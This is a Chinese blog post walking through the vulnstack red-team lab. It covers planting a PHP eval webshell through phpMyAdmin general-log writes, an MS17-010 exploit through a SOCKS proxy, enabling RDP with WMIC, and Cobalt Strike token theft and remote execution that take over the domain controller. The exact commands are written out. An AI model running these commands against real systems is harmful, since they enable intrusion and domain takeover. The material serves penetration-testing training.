内网渗透(CS与MSF联动) ATT&CK实战系列一红队实战(一)

已于 2023-05-17 12:18:01 修改
阅读量684 收藏 5
点赞数 2
分类专栏: 内网渗透 文章标签: 安全 网络安全
于 2023-05-17 12:13:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41743240/article/details/130680025
版权

靶场下载地址:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

拓扑图

环境配置

win7网络配置情况:

外网

 内网域网络

 Win2K3网络配置情况:

内网域网络

 win2008(域控)网络配置情况:

内网域网络

渗透过程

开始之前,先到win7上开启phpstudy

 打开网页,发现是个phpstudy探针

phpstudy是2014的所以不存在后门漏洞

底部有个mysql连接检测,输入root,root即可连接成功

 

 尝试连接数据库,不允许对外访问

 爆破目录

有phpmyadmin

 登入后台直接写shell

show variables like '%general%'; 
set global general_log = on; 
set global general_log_file = 'C:/phpstudy/www/0kam1.php'; 
set @a = '<?php eval($_POST["0kam1"]);?>';

 

 上蚁剑

 CS上线

建好监听器后直接web投递(不行就手动投递)

生成木马直接扔蚁剑上,然后运行

成功上线

执行ipconfig命令可以发现一个10.10.10.0的网段

 存活主机探测

 

 对10.10.10.154进行端口扫描

 发现开启了445端口,尝试扫描ms17-010漏洞

开启socks代理

 配置一下proxychains4代理,用proxychains4启动msf

 扫描结果显示存在ms17_010漏洞

 漏洞利用

成功执行ipconfig

开启3389 

set command 'wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1'

 运行netstat -an命令

访问通过socks访问远程桌面

我们还需要创建一个用户,这里为了方便起见,使用 windows/smb/ms17_010_psexec 模块进行

payload需要使用 windows/shell/bind_tcp,如果使用windows/meterpreter/bind_tcp无法获取到sessions

获取到cmd后创建用户并加入管理员组

 输入刚刚创建的账号密码登入成功

CS转发上线

 

 生成木马

这里win7是台web,可以把木马直接放服务器上

再win2k3上下载木马并运行

 成功上线

 执行命令

net config workstation

发现存在GOD域

 定位域控IP,查看dns

ipconfig /all

 查看进程

ps

 发现存在GOD\Administrator账号的进程

窃取进程令牌

steal_token [PID]

以GOD\Administrator权限运行木马

 remote-exec wmi 10.10.10.154 C:\Documents and Settings\okami\Desktop\shell.exe

 使用GOD\Administrator权限的回话,将木马上传到域控

shell copy shell.exe \\10.10.10.153\c$

 执行域控上的木马

remote-exec wmi 10.10.10.153 C:\shell.exe

 成功获取到域控权限

0kam1
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
powershell cs上线_红队CS工具的基本使用
weixin_39976382的博客
10-21 1204
简介:Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。还可以进行钓鱼攻击包括:网站克隆、目标信息获取、java执行、浏览器攻击等CS主要用于团体协作,可以让多个攻击者同时连接到团体服务器,共享信息。环境搭建:CS分为客户端和服务端,其中服务端只能运行在Linux系统...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线
剁椒鱼头没剁椒的博客
05-18 2115
本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。可以看到我下面已经列出了相关的IP地址,这里我就简单介绍一下。攻击机的目标是Windows7系统,而攻击机是无法直接连接Windows7,如果这里不了解我说的是什么意思,请去学习一下路由原理吧!自然而然下面也就不用解释了,肯定是能够连接能够连接能够连接到Windows7。目前攻击机只能够连接,但是我们可以通过采用一些技术而实现和Windows7。
CobaltStrike4.8渗透工具cs下载(有手就会版)
最新发布
2301_79316009的博客
06-21 446
ls -l看teamserver权限,像我这个图就是已经 chmod加权 过了。也可以ctrl+x(x点五下)强制退出rz命令,但是偶尔对文件有损失。小白白,刚上手一般会忘记开端口号50050,而导致客户端会连接超时。3.请求特征:下发的指令,url路径,老版本固定的ua头。这里只需要给予teamserver文件执行权限即可。上传成功后等待一会儿,就会自动取消rz命令的执行。3.2.1给予teamserver文件的权限。如果进行二开魔改后的cs,可提取样本。3.2.2 运行服务端。
msfcs联动
bring_coco的博客
05-18 1986
环境:kali(192.168.190.128)NATAPP。
红日实战——使用CS拿下域内主机
a2106883567的博客
09-22 179
其中win7作为web服务器来使用,与其他两个电脑都在内网中,并且可以互相访问。Kali自带了arp扫描器,可以通过这个工具扫描出和自身网卡同一网段的主机。这里使用phpmyadmin日志写shell,先查看有没有开启日志。可以看到没有开启,并且secure_file_priv没有具体值。含有两个网卡,其中一个为VM13为内网,另一个为NAT连接外网。使用root权限进行扫描,很快就可以发现在同一个网段下的主机。可以看到内网之间的主机互通,而外网访问不了内网。arp-scan -l #扫描网段所有主机。
内网横向渗透神器-CS
qq_39756628的博客
06-22 2439
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防中,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
由浅入深的域渗透系列一(下)1
08-03
3. **Cobalt Strike(CS)与Metasploit Framework(MSF联动**:Cobalt Strike是一款高级的渗透测试工具,而Metasploit是一个开源的安全测试框架。两者可以协同工作,例如,通过在MSF中设置监听器,然后通过CS派生...
漏洞靶场实战-红队靶场从外网 Weblogic 打进内网,再到约束委派接管域控
Love&Share
05-09 3276
文章目录环境搭建1.外网打点2.上线 CS3.内网横向信息收集存活探测&漏洞扫描搭建代理ms17010抓密码4.二层内网域渗透win7上线cs内网信息收集二层Frp代理打数据服务器SQL server上线CS5.域内委派拿域控 从外网 Weblogic 打进内网,再到约束委派接管域控 靶场来自渗透攻击红队,官方 wp 及下载地址:https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ 本靶场存在的漏洞: GPP:admin:admin!@#45 存在 G.
红日安全红队靶场(三)一次简单的内网渗透
白帽技术与网络安全
07-24 5542
1、靶场介绍及设置这是红日团队的第三套靶场靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成,其...
一次极其曲折的多层靶场渗透--渗透攻击红队靶场
include_voidmain的博客
11-03 620
一次极其曲折的多层靶场渗透--渗透攻击红队靶场
渗透靶场--vulnstack-红队评估实战(2)
weixin_45794666的博客
07-20 1607
vulnstack-红队评估实战(2) 环境配置 攻击者: kali 192.168.154.129 windows 192.168.154.1 靶场: WEB:对外边界服务器 10.10.10.80 192.168.154.80 PC:域成员 192.168.154.201 10.10.10.201 DC:域控 10.10.10.10 1.外网主机信息搜集 nmap 扫描web服务器端口 发现开放了80和7001 80无内容,7001weblogic版本为10.3.6.0 直接上工具获得权限代
Web渗透漏洞靶场收集
Karka_的博客
03-19 237
如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。初学的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些入门Web安全必不可错过的靶场。AWVS的测试站点,用于扫描效果验证,提供了多场景的公网靶场,也常作为漏洞利用演示的目标。Web安全入门必刷的靶场,包含了最常见的web漏洞,界面简单易用,通过设置不同的难度,可更好地理解漏洞的原理及对应的代码防护。
cs linux内网渗透,GitHub - H4ckForJob/SharpToolsAggressor: 内网渗透中常用的c#程序整合成cs脚本,直接内存加载。持续更新~...
weixin_27729671的博客
05-15 332
SharpToolsAggressorSharpEventLog: Windows Login EventLogGet Windows Login EventLog:Login success:4624 And Login Failure:4625c# 读取登录过本机的登录失败或登录成功(4624,4625)的所有计算机信息,在内网渗透中快速定位运维管理人员。https://github.com/...
【渗透测试笔记】之【内网渗透——CS权限维持:CS上线后进程自迁移插件】
AA8j的博客
10-25 2830
1. 服务端加载malleable配置文件 1.1 下载 下载地址:https://github.com/threatexpress/malleable-c2 下载cs对应版本配置文件: 我这里下载4.3版本的。 1.2 加载配置文件 下载完后放入CS根目录: 加载配置文件启动方式,只需要在末尾跟上配置文件就可以了: ./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile 2. 客户端加载cna插件 2.1 插件下载 下载地址:https://git
红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
11-16
CSMSF是两种常见的渗透测试工具,分别是Cobalt Strike和Metasploit Framework的缩写。这两个工具都可以用于渗透测试和红队行动。 证书指纹是指数字证书中的一个唯一标识,可以用于验证数字证书的真实性。常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值